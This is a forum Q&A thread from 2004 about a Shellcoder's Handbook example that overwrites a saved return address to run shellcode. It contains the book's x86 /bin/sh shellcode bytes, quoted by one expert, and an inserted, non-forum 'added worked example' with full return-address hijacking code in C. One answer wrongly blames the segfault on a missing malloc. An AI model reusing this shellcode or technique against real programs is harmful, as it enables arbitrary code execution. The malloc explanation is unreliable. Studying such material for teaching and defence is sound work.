Solved

q about char code[] cast as (int)code conversion

Posted on 2004-09-15
15
480 Views
Last Modified: 2010-04-15
Hi C area guys and gals,
The following is code from The Shellcoder's Handbook, page 23. It segfaults, and when debugging I run across an incomprehensible value for (int)shellcode.

char shellcode[] = "0001";      /* placeholder standing in for the book's real shellcode bytes */
int main() {
  int *ret;
  ret = (int *)&ret + 2;        /* two int slots above ret: the book assumes saved EBP at +1 and the return address at +2 */
  (*ret) = (int)shellcode;      /* overwrite the saved return address with the address of shellcode */
}

As shown in the debugging cut/paste here:

(gdb) p shellcode
$1 = "0001"
(gdb) p &shellcode
$2 = (char (*)[5]) 0x8049534
(gdb) p (char *)shellcode
$3 = 0x8049534 "0001"
(gdb) p (int)shellcode
$4 = 134518068

$4 is different from the hex value 0x8049534, and sizeof char on RHFC2 is 4, so I thought it would print "1" because char shellcode[] = "0001". Why doesn't it?
0
Question by:joesp
15 Comments
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12065777
134518068 is exactly 0x8049534.
(int)shellcode will print the address of shellcode;
it does not mean parsing the string shellcode into an int value,
so it would not be 1.

If you tell us what this code is meant to show in the example, it may help us to explain it.
0
 
LVL 1

Author Comment

by:joesp
ID: 12066110
Uh, yes, I was wrong about the conversion -- I finally found a hex-to-dec converter in converter.java, and it is an int conversion of the address 0x8.....
What does it do?
They are adding 2 to the address of the first variable on the stack to overwrite its RET value (I think the stack is

RET
EBP
shellcode

so &shellcode+2 == &RET)
(gdb) p &ret
$1 = (int **) 0xfeefdb64
(gdb) info registers
eax            0x0      0
ecx            0xfeefdbfc       -17835012
edx            0xfeefdbf4       -17835020
ebx            0x552ffc 5582844
esp            0xfeefdb60       0xfeefdb60
ebp            0xfeefdb68       0xfeefdb68
esi            0x1      1
edi            0x5550fc 5591292
eip            0x804834c        0x804834c

So &ret is between ebp and esp.

In gdb, &ret+1 == ebp.
If I use &ret+1 instead of &ret+2 it doesn't segfault. Does anybody know the purpose, though, of casting to "int"?
0
 
LVL 4

Expert Comment

by:smpoojary
ID: 12066149
char shellcode[] = "0001";
int main() {
  int *ret;
// Here the memory allocation statement for ret is missing.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

In the above code you didn't initialize memory for ret. To initialize memory, use malloc() or calloc(). That's why the segmentation fault is coming. That means you can't use &ret + 2. First you have to initialize ret [ret = (int*)malloc(5*sizeof(int));], then you can write ret = ret + 2; (*ret)=(int)shellcode;

-Mahesh
0

 
LVL 5

Expert Comment

by:tzxie2000
ID: 12066177
I think you should make clear the byte size of ebp .... on your computer and system.
0
 
LVL 16

Expert Comment

by:PaulCaswell
ID: 12066316
It's a stack hack!

>>ret = (int *)&ret + 2;

is taking the address of the only variable on the stack and adding 2 to it. It is therefore assuming that the return opcode is next on the stack, that it is 2 bytes in length, and that there is an important address following it. It's then trying to hack that address to contain some stupid value: the address of a string in data space.

It WILL go bang on almost every system other than the one it was crafted for.

Paul
0
 
LVL 1

Author Comment

by:joesp
ID: 12066367
But my post @ 8:43 shows
------------------
(gdb) p &ret
$1 = (int **) 0xfeefdb64
------------------
It has an address on the stack. Maybe what you mean is -- it's not initialized, so the place it points to hasn't been initialized yet, or no space has been allocated on the heap .. but this is all just stack address manipulation.

ebp in x86 points to the beginning of the stack, like esp points to the current location of the stack pointer.
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12066411
ret really does not point to an allocated memory part.
The program surely wants to touch some part of the stack that normally cannot be accessed through the variables in the function.
I think it may be the return value of main,
but it is straightforward for
(*ret) = (int)shellcode;
so maybe you should read carefully what this example in the book wants to tell you.
If you still don't know the meaning, please post the book's reference part of the example and let's discuss it.
0
 
LVL 1

Author Comment

by:joesp
ID: 12066417
I may have to figure out on my own why it's not working. The book example he gives segfaults, unless I only add 1 to &ret ... which doesn't run the shellcode, so I will have to research this one. This problem runs deeper than I thought ... originally, I just wanted to know why it casts to an int. I'm still open for that answer, BTW.
0
 
LVL 1

Author Comment

by:joesp
ID: 12066472
Source:

http://www.sirfsup.com/languages/assembler/koziol/Chapter_02/Shellcoders02sampleprogram05.c

It should do this:

$gcc shellcode.c -o shellcode
$./shellcode
#

As he explains, the shellcode is the objdump of executable code to create a shell.
0
 
LVL 5

Accepted Solution

by:
tzxie2000 earned 150 total points
ID: 12066490
Oh, I see.

I think it may want to assign the return position in the stack,

like a slightly different code:

char shellcode[] = "0001";
int f(void);          /* prototype, so f is declared before main calls it */
int main() {
  int i;
  f();
  i=1;
}
int f(void) {
  int *ret;
// Here the memory allocation statement for ret is missing.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

Normally the return address will be the code site at i=1; but after

  int *ret;
// Here the memory allocation statement for ret is missing.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;

the book wants to assign the return address into the data segment, and when the function f (or main) returns it will access the data segment and lead to a segfault.
0
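An added worked example of the mechanism the accepted answer describes; it is not code from the book or from anyone in this thread. A function overwrites its own saved return address so that the `ret` instruction transfers control somewhere else. It makes explicit two things the book's snippet leaves implicit. First, the cast to int in `(*ret) = (int)shellcode;` exists only because `*ret` is an int lvalue and the code wants to store a pointer into it; on the 32-bit systems the book targets, int and char * are both 4 bytes, so the address survives the cast (this example uses uintptr_t, which is sized to hold a pointer on any platform). Second, `(int *)&ret + 2` hard-codes an assumption about where the compiler placed `ret` relative to the saved EBP and the return address. The example instead derives the slot from the frame pointer (the word just above the saved frame pointer, which is the layout on i386, x86-64 and AArch64 when a frame pointer is kept; GCC and Clang set one up in any function that uses `__builtin_frame_address(0)`), checks that the slot really holds the return address before writing, and reports how many words separate a local from that slot. The target is a C function in .text rather than a char array in .data, because a writable data section is not guaranteed to be executable. The names `run_demo`, `victim`, `payload` and `measured_offset` are this example's own; it assumes GCC or Clang on a platform with the frame layout above, and it assumes no return-address signing (PAC) or shadow stack, either of which would stop it.

```c
/* Added example, not from the book or the thread: hijack a function's own
 * saved return address, but locate and verify the slot instead of assuming
 * it sits exactly two int slots above the first local.  Needs GCC or Clang. */
#include <setjmp.h>
#include <stdint.h>
#include <stdio.h>

static jmp_buf back;                 /* recovery point for the payload */
static volatile int payload_ran;     /* set by payload() */
static volatile long slot_offset;    /* words from victim()'s local to the RET slot */

/* Stand-in for the book's shellcode: a real function in .text, so it is
 * executable even where the .data section is mapped non-executable. */
static void payload(void)
{
    payload_ran = 1;
    /* We were entered by 'ret', not 'call': there is no valid return
     * address for us to use, so unwind back to run_demo() instead. */
    longjmp(back, 1);
}

/* Like the book's main(): overwrite this function's own saved return
 * address with the address of the code to run.  Unlike the book, find the
 * slot from the frame pointer and check its contents before writing. */
__attribute__((noinline))
static void victim(void)
{
    uintptr_t local[1] = { 0 };              /* plays the role of the book's 'ret' */
    /* On i386, x86-64 and AArch64 (with a frame pointer) the saved return
     * address is the machine word just above the saved frame pointer. */
    uintptr_t *slot = (uintptr_t *)__builtin_frame_address(0) + 1;
    uintptr_t real  = (uintptr_t)__builtin_return_address(0);

    slot_offset = slot - local;              /* the book hard-codes this as 2 */
    if (*slot != real)                       /* layout assumption was wrong: touch nothing */
        return;
    *slot = (uintptr_t)payload;              /* the book's (*ret) = (int)shellcode; */
    /* victim()'s 'ret' now transfers control to payload() instead of run_demo(). */
}

/* Returns 1 if payload() ran via the hijacked return, 0 otherwise. */
int run_demo(void)
{
    payload_ran = 0;
    slot_offset = 0;
    if (setjmp(back) == 0) {
        victim();
        return 0;                            /* reached only if the slot check failed */
    }
    return payload_ran;                      /* here via longjmp from payload() */
}

/* Offset, in machine words, from victim()'s local to its saved return
 * address, as measured by the most recent run_demo() call. */
long measured_offset(void)
{
    return (long)slot_offset;
}

int main(void)
{
    int ok = run_demo();
    printf("%s; saved return address is %ld word(s) from the local\n",
           ok ? "hijack succeeded" : "hijack failed (slot did not hold the return address)",
           measured_offset());
    return ok ? 0 : 1;
}
```

The printed offset is what the book's `+ 2` assumes is constant; with a stack protector enabled the canary sits between the locals and the saved frame pointer, so the distance grows, which is one reason a fixed offset fails on a different compiler build. To check the same thing on the book's program in gdb, break after `ret = (int *)&ret + 2;`, compare `p ret` with the saved eip location that `info frame` reports, and use `x/4xw &ret` to see whether the saved EBP and return address really sit at +1 and +2.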
 
LVL 1

Author Comment

by:joesp
ID: 12066726
Does this book example work for anybody else? You can download that source from that same page by clicking "any_browser_source.txt", or if you are using MSIE you need to click "msie.txt".
0
 
LVL 1

Author Comment

by:joesp
ID: 12066889
tzxie2000

You are on the right track ... it is overwriting the return address of RET by replacing that value (which points to an address) not with (wherever the hell "main" returns to after it exits) but with the address of shellcode, which (magically) (magic helped by the fact that it's an object dump?) executes (itself?) after main returns ... I am not convinced it is segfaulting because it is trying to access code from the data section .... once the program exits .... the code in the data section is returned to the system, and it could just be any old addressable address, no?
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12066932
Yes, I tested the code.

I think maybe the shellcode given by the book,
char shellcode[] =    
 "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
 "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
 "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

is more special and contains some code that runs on the system.

I tested the code and my system crashed.
   
0
 
LVL 1

Author Comment

by:joesp
ID: 12067108
tzxie2000, thank you for your time. I am sorry we couldn't resolve this. It is only the second chapter; I will post here when I find the answer later in the book .... I don't have the time at the moment.
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12067174
You're welcome.
0
